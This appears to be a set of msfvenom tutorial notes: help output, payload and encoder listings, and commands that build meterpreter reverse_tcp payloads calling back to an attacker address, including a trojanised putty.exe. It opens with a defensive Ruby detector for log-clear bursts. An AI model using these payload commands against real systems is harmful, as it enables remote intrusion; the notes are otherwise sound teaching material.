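def log_clear_events(events)
  events.select { |e| clear_event?(e) }
end

# Name of the channel a clear record refers to.
def cleared_channel(e)
  e[:id] == 1102 ? "Security" : e[:channel]
end

# Clears of several channels within `window` seconds of each other are the
# footprint of an automated wipe; a lone clear is usually admin housekeeping.
def bulk_clear_bursts(events, window: 60)
  clears = log_clear_events(events).sort_by { |e| Time.iso8601(e[:time]) }
  bursts = []
  clears.each do |e|
    t = Time.iso8601(e[:time])
    if !bursts.empty? && t - Time.iso8601(bursts.last.last[:time]) <= window
      bursts.last << e
    else
      bursts << [e]
    end
  end
  bursts.select { |b| b.size >= 2 }
end

if __FILE__ == $0
  bulk_clear_bursts(SAMPLE_EVENTS).each do |burst|
    who = burst.map { |e| e[:user] }.uniq.join(",")
    puts "ALERT: #{burst.size} logs cleared between #{burst.first[:time]} and #{burst.last[:time]} by #{who}"
    puts "  channels: #{burst.map { |e| cleared_channel(e) }.join(', ')}"
  end
end
```

Because the 1102 record survives in the very log that was emptied, and because the records ship to a collector before the wipe if forwarding is on, clearing logs announces the intrusion rather than hiding it; on a forwarded-log estate the quieter choice for an attacker is to leave the logs alone.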

msfvenom

msfpayload (the payload generator), msfencode (the encoder) and msfcli (the old command-line interface) are history; msfvenom replaced the first two.
1. Basics
Option meanings:

root@kali:~# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>

Options:
-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
-f, --format <format> Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder <encoder> The encoder to use
-a, --arch <arch> The architecture to use
--platform <platform> The platform of the payload
--help-platforms List available platforms
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars <list> The list of characters to avoid example: '\x00\xff'
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out <path> Save the payload
-v, --var-name <name> Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message

1) List payloads

root@kali:~#  msfvenom -l payloads


Framework Payloads (507 total)
==============================

Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
android/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager
……

2) List encoders

root@kali:~#  msfvenom -l encoders

Framework Encoders
==================

Name Rank Description
---- ---- -----------
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot manual BMP Polyglot
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/service manual Register Service
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

Encoders ranked excellent

cmd/powershell_base64  
x86/shikata_ga_nai

3) List NOP generators (padding sleds; multi-byte generators also vary the byte pattern, which helps against signature matching)


root@kali:~# msfvenom -l nops

Framework NOPs (10 total)
=========================

Name Description
---- -----------
aarch64/simple Simple NOP generator
armle/simple Simple NOP generator
mipsbe/better Better NOP generator
php/generic Generates harmless padding for PHP scripts
ppc/simple Simple NOP generator
sparc/random SPARC NOP generator
tty/generic Generates harmless padding for TTY input
x64/simple An x64 single/multi byte NOP instruction generator.
x86/opty2 Opty2 multi-byte NOP generator
x86/single_byte Single-byte NOP generator

4) Supported platforms


root@kali:~# msfvenom --help-platforms
Platforms
aix, android, apple_ios, bsd, bsdi, cisco, firefox, freebsd, hardware, hpux, irix, java, javascript, linux, mainframe, multi, netbsd, netware, nodejs, openbsd, osx, php, python, r, ruby, solaris, unix, windows

5) Output formats

root@kali:~# msfvenom --help-formats
Executable formats
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

6) Show a payload's options

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp --payload-options
Options for payload/windows/x64/meterpreter/reverse_tcp:


Name: Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
Module: payload/windows/x64/meterpreter/reverse_tcp
Platform: Windows
Arch: x64   # the generated payload runs only on 64-bit Windows
Needs Admin: No
Total size: 449
Rank: Normal

Provided by:
skape <mmiller@hick.org>
sf <stephen_fewer@harmonysecurity.com>
OJ Reeves

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Description:
Inject the meterpreter server DLL via the Reflective Dll Injection
payload (staged x64). Connect back to the attacker (Windows x64)


Advanced options for payload/windows/x64/meterpreter/reverse_tcp:

Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.

2. Generating payloads
1) Inject the payload into putty.exe (the result is caught by 360 and similar AV)

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.230 LPORT=4443 -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -x /root/putty.exe -k -f exe -o /root/Desktop/putty_evil.exe
Skipping invalid encoder x64/shikata_ga_nai
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 867840 bytes
Saved as: /root/Desktop/putty_evil.exe

Read the capture carefully: the run it came from asked for x64/shikata_ga_nai, which does not exist (shikata_ga_nai is x86 only; the x64 encoders are x64/xor and x64/zutto_dekiru), so msfvenom skipped encoding and embedded the raw payload. Architecture has to agree across -p, -a, -e and the template: a 32-bit putty.exe takes an x86 payload and an x86 encoder, as written above. -x uses the binary as a template and -k keeps its original behaviour, running the payload in a new thread.
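What -e, -i and -b actually do, reduced to the simplest possible encoder, as an added example (not code from the notes or from msfvenom). A real Metasploit encoder such as x86/countdown or x86/shikata_ga_nai additionally prepends a decoder stub that undoes the transform at run time; only the transform and its bad-character search are shown here. The sample bytes are constructed and are not working shellcode.

```ruby
# Added example, not part of the original notes or of msfvenom: a single-byte
# XOR encoder with bad-character avoidance (-b) and repeated passes (-i).

# Pick a key such that neither the key byte nor any encoded byte is a bad
# char; the key is checked too because the decoder stub has to carry it.
def find_xor_key(shellcode, badchars)
  (1..255).find do |key|
    !badchars.include?(key) &&
      shellcode.each_byte.none? { |b| badchars.include?(b ^ key) }
  end
end

def xor_bytes(data, key)
  data.each_byte.map { |b| b ^ key }.pack("C*")
end

# One encoding pass: returns [key, encoded] or raises when no key works,
# the situation in which msfvenom reports that the encoder failed.
def encode_once(shellcode, badchars)
  key = find_xor_key(shellcode, badchars)
  unless key
    bad = badchars.map { |c| format('\\x%02x', c) }.join
    raise "no single-byte key avoids #{bad}"
  end
  [key, xor_bytes(shellcode, key)]
end

# -i N: encode the output of the previous pass again, N times. Keys are
# returned oldest-first; decoding must apply them in reverse order.
def encode_iterations(shellcode, badchars, iterations)
  keys = []
  blob = shellcode.b
  iterations.times do
    key, blob = encode_once(blob, badchars)
    keys << key
  end
  [keys, blob]
end

def decode_iterations(blob, keys)
  keys.reverse.inject(blob) { |data, key| xor_bytes(data, key) }
end

def contains_badchars?(data, badchars)
  data.each_byte.any? { |b| badchars.include?(b) }
end

if __FILE__ == $0
  # Constructed sample bytes (not working shellcode): contains 0x00 and 0x0a,
  # which a string copy or a line-oriented input path would truncate.
  sample   = "\x31\xc0\x50\x68\x00\x0a\xcd\x80".b
  badchars = [0x00, 0x0a, 0x0d]          # what -b '\x00\x0a\x0d' means

  keys, encoded = encode_iterations(sample, badchars, 3)   # -i 3
  puts "keys: #{keys.map { |k| format('0x%02x', k) }.join(' ')}"
  puts "encoded: #{encoded.unpack1('H*')}"
  puts "bad chars left: #{contains_badchars?(encoded, badchars)}"
  puts "round-trip ok: #{decode_iterations(encoded, keys) == sample}"
end
```

Two things this makes visible. Encoding exists to satisfy the target's input constraints (bad characters, size), not to evade antivirus: a fixed decoder stub plus a known transform is itself a signature, which is why the putty build above is still caught. And each -i pass must find a key for the previous pass's output, so more iterations with a long bad-character list can fail where one pass succeeded.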

2) Windows executable (x86 payload as shown; use windows/x64/meterpreter/reverse_tcp for 64-bit targets; also caught by AV)

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.230 LPORT=4441 -f exe > shell.exe

3) Linux

root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.230  LPORT=4441 -f elf > shell.elf
